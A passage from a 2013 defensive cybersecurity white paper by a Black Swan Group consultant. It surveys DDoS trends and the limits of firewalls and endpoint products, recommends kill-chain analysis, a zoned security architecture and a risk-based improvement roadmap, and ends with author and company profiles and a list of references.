12 http://www.scmagazine.com/botnets-the-backdoor-to-the-enterprise-network/article/242016/ 13 For more information about DoS attacks, visit: http://www.dsd.gov.au/publications/csocprotect/ddos_mitigation.htm
63% of organisations
are infected with
bots, with most
organisations
infected by a variety
of bots.Check Point
24
that target the application layer, such as massive amounts of HTTP GET
traffic.AKAMAI
Figure 18: DDoS Attack Types
Source: Arbor Worldwide Infrastructure Security Report Vol. XIII 2012
Recent DoS attack traffic volume rate is almost impossible for the typical
enterprise to defend against. We are now seeing over 10% of DoS attacks
exceeding the 60GB threshold.Prolexic The largest DDoS attack was a massive
300GB using DNS reflection, launched through Open DNS resolvers rather than
directly via compromised networks. Because the attacker used a DNS
amplification, the attacker only needed to control a botnet or cluster of servers
to generate 750Mbps - which is possible with a small sized botnet.14
The DoS attacks associated with Operation Ababil15 is an example of terrorists
expanding their activities and developing new methodologies and tools to make
their DoS efforts more effective. Their motivation can be political or religious
and their capability varies from low to high. Preferred targets of cyberterrorists
are mostly critical infrastructures (eg health, energy, telecommunications, etc.),
as their failures causes severe impact in society and government.ENISA
DoS attacks can be a diversion
Cybercriminals too are involved in DDoS attacks, the goal is often to distract the
targeted business while the criminals commit fraud or simply extort money from
their victim.AKAMAI
In September 2012, the FBI issued a warning to financial institutions that some
DDoS attacks are actually being used as a “distraction.” These attacks are
launched before or after cybercriminals engage in an unauthorised transaction
and are an attempt to avoid discovery of the fraud and prevent attempts to stop
it. They may or may not bring the website down as that’s not the main focus of
the attack; the real goal is to divert the attention of the company’s IT staff
towards the DDoS attack. Meanwhile, the hackers attempt to break into the
company’s network using any number of other methods that may go unnoticed
as the DDoS attack continues in the background.16
14 http://www.theregister.co.uk/2013/03/27/spamhaus_ddos_megaflood/ 15 http://analysisintelligence.com/cyber-defense/deconstructing-the-al-qassam-cyber-fighters-assault-on-us-banks/ 16 http://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
25
6.0 The State of Security Technology
Defences
In security everything fails to the lowest common denominator. We are
predictable to cyberattackers in that they know our weaknesses (multiple
vulnerabilities, poor configurations, gullible people to target for phishing, etc.).
They understand our security defences in that they know we use firewalls,
logging, some IPS, some DLP, maybe proxies.
Perimeter controls were extremely effective…until about three years ago. Two
significant waves have hit already which demonstrate that perimeter defences
are inadequate. One is this new wave of advanced, targeted attacks that are
multi-vector and are perpetrated by well-funded and well-trained adversaries.
Then there is what is called the “ZeusiLeaks Effect”17 – the pervasive use of
high-grade Trojans used by thousands of petty criminals and the fact they are
already operating inside the firewalls of almost every Fortune 500 company.
External attackers are infecting employee PCs, either deliberately or as a side-
effect of financial fraud attacks. Following the successful infection of an
employee PC, the corporation is left with a huge blind spot. Most perimeter
defence technologies are set up to look at and stop threats outside the firewall
and are blind to the ones that have already made it inside.18
With what we’ve learned so far in this report about attackers and their methods,
it’s interesting to note in the figure below that only 48% of companies use
intrusion detection tools and 39% use DLP tools. Consolidated event collection
through security event correlation tools is used by only 36% of companies.
Figure 19: Information Security Technology Safeguards in Place
Source: Key findings from the PWC Global State of Information Security Survey 2013
It will be problematic for these organisations because defending against highly
skilled, well-funded hackers using sophisticated malware and attack scenarios
requires effective people, process and technology defence in depth and diversity
of defence tactics. With less than half the companies in the PWC survey using
advanced detection tools, they’re easy targets for hackers who use low and slow
techniques to evade detection.
17 http://www.cio.com.au/article/396014/mcafee_rsa_entire_fortune_500_compromised/ 18 http://blogs.rsa.com/rivner/it-security-in-the-age-of-apts/
26
Findings from the NSS Labs19, the world’s leading information research and
advisory company, show that technology products alone do not provide
adequate protection.
In 2011, NSS Labs tested six enterprise network firewall products (including
Check Point, Cisco, and Juniper). They found that three of the six firewalls
crashed when subjected to stability tests, indicating opportunities for denial of
service attacks.20
In 2012, NSS Labs tested 15 enterprise network intrusion prevention (IPS)
products from ten vendors in the industry’s most comprehensive test to date. As
indicated in the following graphs, the result was that none of the devices tested
achieved 100% block protection.21
Figure 20: Number of Undetected Exploits by IPS Product (left pane)
Correlation of Undetected Exploits Between Vendors IPS Products (right pane)
Source: NSS Labs Cybercrime Kill Chain vs Defence Effectiveness November 12
Also in 2012, NSS Labs tested 13 popular endpoint security suites. These
endpoint security suites were tested against 144 exploit attack scenarios to
measure their effectiveness in protecting Windows computers against exploits
which have been publicly available for months (and some for years) prior to the
test. Their findings indicated that with a few notable exceptions, endpoint
products are not providing adequate protection from exploits. Even more
troubling was the finding that keeping endpoint protection software up-to-date
does not yield adequate protection against exploits, as evidenced by coverage
gaps for vulnerabilities several years old.22
19 https://www.nsslabs.com/ 20 www.nsslabs.com/reports/network-firewall-group-test-2011 21 www.nsslabs.com/reports/ips-comparative-analysis-2012 22 www.nsslabs.com/reports/consumer-avepp-comparative-analysis-exploit-protection
27
The following figure indicates the percentage of undetected exploits out of 144
exploits:
Figure 21: Endpoint Protection Products – Undetected Exploit
Source: NSS Labs Cybercrime Kill Chain vs Defence Effectiveness November 12
The deficiencies noted in NSS Labs’ test results mean that, based on market
share, about 70% of the world is poorly protected. Most vendors lack adequate
protection against exploits and simple evasions like switching from HTTP to
HTTPS are often effective in bypassing attack detection.
“Simply put, endpoint
protection suites do not
prevent a dedicated
attacker from
compromising a
target.”NSS_2
28
7.0 Recommendations
Modern malware and cyberattack methods are a new attack doctrine built to
circumvent conventional approaches to information security. Unfortunately,
today’s reality is that advanced attack techniques are so successful and
rewarding to attackers that organisations must operate under the assumption that
such attacks are inevitable.
Prevention and detection of cyberattacks now requires an evolved situational
awareness strategy that facilitates the anticipation, discovery and investigation of
anomalous behaviour.
While firewalls, IPSs and antivirus software can catch a lot of malware, every
corporation should assume that some malicious code has gotten through to infect
systems. That means your CIO, business managers, and security team should be
operating under the assumption your organisation is already compromised.NSS_3
Given the pervasive nature of cyberattacks, it is not possible to protect everything.
Security teams will have to focus on protecting the organisation’s most critical
information and systems. That changes the definition of successful defence from
“keeping attackers out” to “sometimes attackers are going to get in”.
Detection is difficult because there is no single event to indicate compromise.
Low and slow actions by skilled attackers will not stand out from the thousands of
events occurring in an IT infrastructure every day – the proverbial needle in a
haystack. Many victims have been compromised for a long time and relevant logs
have long since passed. The majority of breaches take months or more to
discover.Verizon
SECURITY AS A COUNTERINTELLIGENCE FUNCTION
Situational awareness is being aware of one's surroundings and identifying
potential threats and dangerous situations. It is a fundamental building block in
collective security and is more of a mindset than a hard skill.
Developing this mindset in light of today’s cyberthreat landscape requires us to
rethink our position and start viewing information security more like a
counterintelligence function. This new thinking should compel us to
operationalise defensive measures such as identifying and prioritising information
assets and the systems that store and transmit critical information, developing
mitigation strategies and tactics, exercising response plans, creating separate
networks for mission critical information assets, and developing an end to end
view of network and system activity to improve situational awareness.
Just as traditional intelligence ascertains an understanding of adversaries’
capabilities, actions, and intent, the same values carry over to the cyber domain.
Cyber counterintelligence seeks to understand and characterise things like: what
sort of attack actions have occurred and are likely to occur; how can these actions
be detected and recognised; how can they be mitigated; who are the relevant
threat actors; what are they trying to achieve; what are their capabilities in the
form of tactics, techniques, and procedures they have leveraged over time and are
likely to leverage in the future; what sort of vulnerabilities, misconfigurations, or
weaknesses they are likely to target; etc.23
23 http://www.mitre.org/work/cybersecurity/pdf/stix.pdf
Rethink your
cybersecurity
situation by taking
on an “assume
you’re breached”
mentality.
29
The cyber counterintelligence approach shares many characteristics of traditional
intelligence analysis. The figure below shows the key activities of the classic
intelligence Observe-Orient-Decide-Act loop. The loop begins with collecting and
correlating a broad range of technical and environmental data and then
developing and testing hypotheses about adversary capabilities and intentions.
Like traditional intelligence analysis, cyber counterintelligence seeks to provide
actionable information to friendly forces.24
Figure 22: John Boyd’s Observe-Orient-Decide-Act Loop
Source: http://pogoarchives.org/m/dni/john_boyd_compendium/essence_of_winning_losing.pdf
BREAK THE CYBER KILL CHAIN
Cyber counterintelligence analysis strives to better position cyber defences to
prevent or quickly contain cyber intrusions that occur. Cyber counterintelligence
analysis is aided by the attack lifecycle model built upon the kill chain
framework25. In military parlance, a kill chain is a phase-based model to describe
the stages of an attack, which then informs ways to prevent such attacks. Kill
chain analysis is a model to analyse the intrusions in a new way. In a kill chain
model, just one mitigation breaks the chain and thwarts the attacker.
Defenders collect and analyse data and correlate it against the stages of an
attack. Defensive engagement of the threat across the whole kill chain is critical.
The early stages of the kill chain represent an opportunity to proactively detect
and mitigate threats before an adversary establishes a foothold.26
For example, to compromise a target system, an attacker follows a defined
methodology as indicated in the figure below. Ideally, the earlier in the kill chain
an attack can be stopped, the better chance you have of stopping the attack.
24 http://www.mitre.org/work/cybersecurity/pdf/protex3.pdf 25 http://www.lockheedmartin.com/content/dam/lockheed/data/corporate/documents/LM-White-Paper-Intel-Driven-Defense.pdf 26 http://www.mitre.org/work/cybersecurity/focus/threat_based_defense.html
30
Figure 23: Attack Lifecycle
Source: E&Y/ISACA Responding to Targeted Cyberattacks Report, 2013
In a cyberattack, the kill chain defence leverages the fact that a successful attack
must complete all stages from planning and malware introduction to expansion
and one or more command and control phases, until the target is identified,
manipulated and exfiltrated. The goal of a kill chain defence is to break one or
more stages in the attack chain to stop the progress of the attack and force the
opponent to start over.
Responding to incidents after the exploit has already occurred is costly, both in
the effective impact and in the level of effort necessary to root out the adversary’s
established foothold. To be proactive, cyber defenders need to fundamentally
change the nature of the game by stopping the adversary’s advance, preferably
before the exploit stage of the attack (that is, moving left of the attack). Moving
left of the attack requires defenders to evolve from a defensive strategy based
primarily on after-the-fact incident investigation and response to one driven by
cyber threat intelligence.27
In figure 23 above, the steps left of Establish foothold represent an opportunity to
proactively detect and mitigate threats before the adversary establishes a
foothold. To the right of Establish foothold, incident detection and response can
be exercised along with assurance of mission-critical assets. To best leverage the
opportunity for active defence, it is necessary to perform a retrospective analysis
of threat characteristics across the entire kill-chain and correlate the results to
produce tell-tale indicators.28
It’s important to remember three things about this method: 1) the attacker must
make the entire chain work to succeed; 2) you need only kill one link to stop them;
and 3) having detection and kill capability at each point in the enemy’s attack
chain gives you the highest probability of success in this defence.29
Most detected intrusions will provide a limited set of attributes about a single
phase of an intrusion. Analysts must still discover many other attributes for each
phase to enumerate the maximum set of options for courses of action. As
defenders collect data on adversaries, they will push detection from the latter
phases of the kill chain into earlier ones. Detection and prevention at pre-
compromise phases also necessitates a response. Defenders must collect as
much information on the mitigated intrusion as possible, so that they may
synthesise what might have happened should future intrusions circumvent the
currently effective protections and detections.30
27 http://www.mitre.org/work/cybersecurity/pdf/stix.pdf 28 http://www.mitre.org/work/cybersecurity/pdf/active_defense_strategy.pdf 29 http://www.enterprisecioforum.com/en/blogs/jim-ricotta/cyber-attack-kill-chain-defense 30 http://www.lockheedmartin.com/content/dam/lockheed/data/corporate/documents/LM-White-Paper-Intel-Driven-Defense.pdf
“If the enemy
attacks first you
can lead him
around. In strategy,
you have effectively
won when you
forestall the
enemy.” Miyamoto Musashi
31
Kill chain analysis makes it more effective for organisations to implement
appropriate defensive controls at each stage of the attack lifecycle. Clearly, as
this author has been advocating for years, the best way to protect yourself is to
build a defence-in-depth strategy with multiple layers of security through a well-
constructed zoned security architecture.
THE NECESSITY OF A ZONED SECURITY ARCHITECTURE
Current attack scenarios should be shifting your security environment away from
the fortress model of security strategies that are perimeter based with disparate
security controls operating independently. To combat today’s cyberthreats, your
security architecture must be based on strategies like least privilege, defence in
depth, diversity of defence, choke point, systems segmentation and dedicated
functionality. The security architecture must include concentric layers of
protection that provide multiple, diverse and complex protection barriers that an
attacker (or automated malware) must penetrate one at a time. This dramatically
increases the difficulty of exploitation and the time it takes, giving businesses an
increased opportunity to detect and respond to attack activity.
A formal security architecture framework is a foundational model and
methodology for developing a tactical security architecture. It provides the
fundamental technology components and interconnecting structure required to
support the security requirements of the business. The security architecture
framework provides for the organisation and placement of the primary functions
of service presentation, business logic and secure data storage and the internal
and external users of information processed through these primary functions.
Using this structure of functions, the security architecture overlays the existing IT
architectural structure for business solutions development while facilitating the
logical grouping of users and devices of similar trust levels and the information
assets that require varying protection and controls.
Enterprise networks are composed of users, devices, and systems with varying
security requirements with regard to confidentiality, integrity, availability,
authenticity, and non-repudiation. Because the risks facing users, devices, and
systems are different, it is logical to separate higher risk entities from lower risk
entities and group like entities requiring common protection strategies. Like
entities can then be grouped into zones.
A zone is a collection of users, devices and systems with a similar level of trust or
those requiring similar protection and controls, logically bound together.
32
A simple security architecture zone model is shown in the following diagram:
Figure 24: Simple Security Architecture Zone Model
Source: Burton Group, Reference Architecture Decision Point - Zones
Zoning can be viewed as an organising vehicle to reduce architecture complexity,
facilitate cross-functional understanding between security, IT infrastructure,
applications development, and outsource partner teams, and ultimately provide
an inherently more secure infrastructure.
Zones are demarcated by perimeters. Perimeter topologies vary in complexity
based on the risk profile of a particular zone. Perimeters are designed specifically
to implement physical and logical separation and isolation mechanisms to control
the communications flow into and out of a zone. The basic mechanism to mediate
perimeters is the firewall. The firewall serves as a policy enforcement point
regarding access control and network traffic. A full risk assessment would
determine the required boundary controls in addition to the firewall such as
application proxies, intrusion prevention systems, strong authentication, and other
security controls.
The real benefit of introducing a security architecture zone model results from the
gradations of protection against the volume, variety, and velocity of information
security threats facing the typical organisation. Zone modelling employs
concentric layers of protection to dramatically increase the difficulty of
exploitation. Concentric layers of protection provide multiple and diverse
protection barriers that an attacker must penetrate one at a time. A properly
constructed zoned security architecture provides formidable challenges to the
attacker and is your best chance of protection complexity, time required for the
attacker to penetrate multiple layers, and the increased opportunity to detect
attack activity.
DEVELOP A SECURITY IMPROVEMENT ROADMAP
One of the best defence strategies against cyberattack is to assess the
effectiveness of your internal people, process, technology and organisational
controls to understand your current state of security. Once you have determined
“In all forms of
strategy, it is
necessary to
maintain the combat
stance in everyday
life and to make your
everyday stance your
combat stance.” Miyamoto Musashi
33
where gaps exist, you can develop a prioritised risk improvement roadmap to get
to your desired future state of information security.
The following example depicts a high level prioritised, risk based improvement roadmap:
Figure 25: Example of a Prioritised, Risk-based Improvement Roadmap
(Source: Keith Price)
The example improvement roadmap above shows the implementation plan, including
the sequence of implementation for the recommended technologies and service
capabilities. The roadmap shows four distinct streams which run in parallel:
Quick wins & expanded capabilities
Business alignment
Integrated solutions
Optimised capabilities & visibility
The quick wins and expanded capabilities stream expedites initiatives already under
way, expands the full functionality of technologies already deployed, or kicks off
initiatives that can be enabled quickly.
The business alignment stream facilitates development of a governance, risk, and
compliance management system to implement the recommended technologies and
service capabilities. It starts with executive briefings to cultivate support for the
program and includes an expanded security awareness program for all levels of staff.
Asset management and network security architecture align protection efforts.
The integrated solutions stream introduces new technologies necessary to prevent or
detect a sophisticated attack.
The optimised capabilities and visibility stream is designed to enhance the
configuration and vulnerability management programs as well as operational services
around incident management and penetration testing.
34
8.0 Conclusion
Cybercrime hurts everyone. Not just because of the damage it causes businesses,
governments, and consumers but because it undermines the confidence in ecommerce
and the Internet. In a world where practically everything depends on connection to the
Internet, protection is crucial.
Yet no organisation can afford to eliminate all cyber risks - the cost/benefit
justifications just aren’t there. The trade-off between risk exposure and risk
management is becoming increasingly complex, and there's no silver bullet for
managing cyber risk. Each organisation needs to establish its own risk tolerance
threshold. Some cyber risks will be accepted because the exposure is so small or the
cost too great to eliminate them; others must be mitigated because the potential of a
cyber black swan event is too great.
As this paper has demonstrated, the best response we have today starts with asking
the right questions, understanding attacker’s motives, capabilities, and methods and
knowing where we’re vulnerable, so we have a better chance of protecting ourselves.
To effectively deal with cybercrime, security defence must evolve into a
counterintelligence function that provides us with the requisite knowledge to prevent,
detect and respond to cyberattacks.
Understanding the cyber kill chain and how a zoned security architecture based on
concentric layers of protection can help break a chain of an attack provides a new
approach to security defence. Together with a road map for protection improvements,
these strategies will help you get to your desired future state of information security
while achieving your business goals.
For further cybersecurity counterintelligence reports, see the list of references on page
37.
For more information about how to manage cybersecurity threats, contact Black Swan
Group for a discussion about how the strategies outlined in this paper may help protect
your organisation.
35
9.0 About the Author
KEITH PRICE
DIRECTOR AND PRINCIPAL CONSULTANT, BLACK SWAN GROUP
[email protected] +61 438 138 535
Keith specialises in information security and IT risk governance, strategy,
architecture and assurance. During a 30 year career, he’s been at the cutting
edge of technology - avionics, land mobile radio, telecoms & PABX, Novell
networking, the emergence of the Internet, Internet banking, large scale B2B, B2C
and B2E ecommerce systems, and pioneering technologies for network security.
More recently as co-founder of the Black Swan Group security consulting practice,
he’s developed a comprehensive set of security and IT governance, architecture,
and assurance methodologies based on international experience, extensive
research, and recognised standards of practice.
His approach to IT and security is based on a deep technical understanding of
enterprise architecture, solutions development, IT infrastructure, and e-commerce
technologies for B2B, B2C and B2E gateways and converged voice, data and
video networks.
He’s been a leader in the IT security industry having served in director positions
for the Australian Information Security Association (2010-2012) and the ISACA
Sydney Chapter (2007-2009).
Educated in the U.S., he has BBus and MSc degrees. His certifications include
CISSP, CISM, & CGEIT.
36
10.0 About Black Swan Group
Founded in 2010, Black Swan Group has rapidly established itself as a respected
provider of information security and IT risk management services. Our clients
include a number of Australia’s largest corporate, financial, and government
organisations.
Black Swan Group’s exceptionally strong security skills underpin our information
technology, IT operations, risk management and assurance services.
We provide a comprehensive range of information security services to identify and
evaluate IT security risks and design and implement solutions which mitigate
exposures. We support the full project lifecycle - from strategy, architecture,
assessment and assurance through to deployment, operational integration, and
lifecycle management. Our services encompass:
Secure Integration Assurance
Consulting
Architecture and Design
Solutions Integration
Operational Integration
Our core values are integrity, commitment to clients and value delivery. We
provide straight talk and frank advice, unclouded by product sales.
Black Swan Group can work with you to develop effective frameworks and
methodologies for information and technology governance, policy, strategy, risk
management, and assurance.
Having been involved in numerous integration projects around the globe, we
understand technology alone is not the answer. People, process and technology
are essential ingredients for secure and streamlined operations, and we have a
deep understanding of the issues surrounding all three.
We “sweat the small stuff” with meticulous attention to detail to ensure a solution
is both comprehensive and sound. As this paper indicates, one of our key
strengths is our ability to conceptualise extremely complex issues and distil them
into streamlined strategies for protection that work in practice.
With decades of experience around the globe in a wide range of information
technology and risk management functions, we know what works and what
doesn’t.
Black Swan Group
Phone: 1300 558 451
Email: [email protected]
Website: www.blackswangroup.com.au
37
11.0 References
Major threat and security reports consulted and quoted in this report are listed
below. Direct quotes in this paper from these sources are referenced by source name. Other sources consulted are referenced in footnotes throughout the paper.
1. AKAMAI: State of the Internet Report, Q4 2012
2. ANTI: Anti Phishing Working Group, Phishing Activity Trends Report Q1
2012
3. Arbor: Worldwide Infrastructure Security Report Volume XIII 2012
4. CERT_AU: Cyber Crime & Security Survey Report 2012, CERT Australia
and Centre for Internet Safety, University of Canberra.
5. Check Point: Security Report 2013
6. Cisco: Annual Security Report 2013
7. Deloitte: Technology, Media, and Telecommunications (TMT) Global
Security Study 2013
8. ENISA: Threat Landscape Report, January 2013
9. E&Y: Ernst & Young’s Global Information Security Survey 2012
10. ISACA: E&Y/ISACA, Responding to Targeted Cyberattacks Report 2013
11. Forrester: The State of Data Security and Privacy: 2012 To 2013
12. IBM: X-Force Trend & Risk Report 2012
13. ISO/IEC 15408-1: Information technology, Security techniques,
Evaluation criteria for IT security, Part 1 Introduction and general model
14. Mandiant: APT1 Exposing One of China’s Cyber Espionage Units March
2013
15. Norton: Cybercrime Report 2012
16. NSS_1: NSS Labs Vulnerability Threat Trends 2013
17. NSS_2: NSS Labs Cybercrime Kill Chain vs Defence Effectiveness
November 2012
18. NSS_3: NSS Labs Modelling Exploit Evasions in Layered Security
December 2012
19. O-ESA: Open Enterprise Security Architecture, The Open Group
20. Ponemon: IBM and Ponemon, The Source of Greatest Risk to Sensitive
Data February 2012
21. Prolexic: Quarterly Global DDoS Attack Report, Q1 2013
22. PWC: Key findings from the PWC Global State of Information Security
Survey 2013
23. RSA: The Current State of Cybercrime 2013
24. SBIC: Information Security Share-up, Disruptive Innovations to Test
Security’s Mettle in 2013
25. Secunia: Vulnerability Review 2013
26. Sophos: Security Threat Report 2013
27. Symantec: Internet Security Threat Report, Vol 18 2013
28. Sym_Supp: Symantec Internet Security Threat Report Supplementary
Data Vol 18, 2013
29. Trustwave: Global Security Report 2013
30. Verizon: Data Breach Investigations Report 2013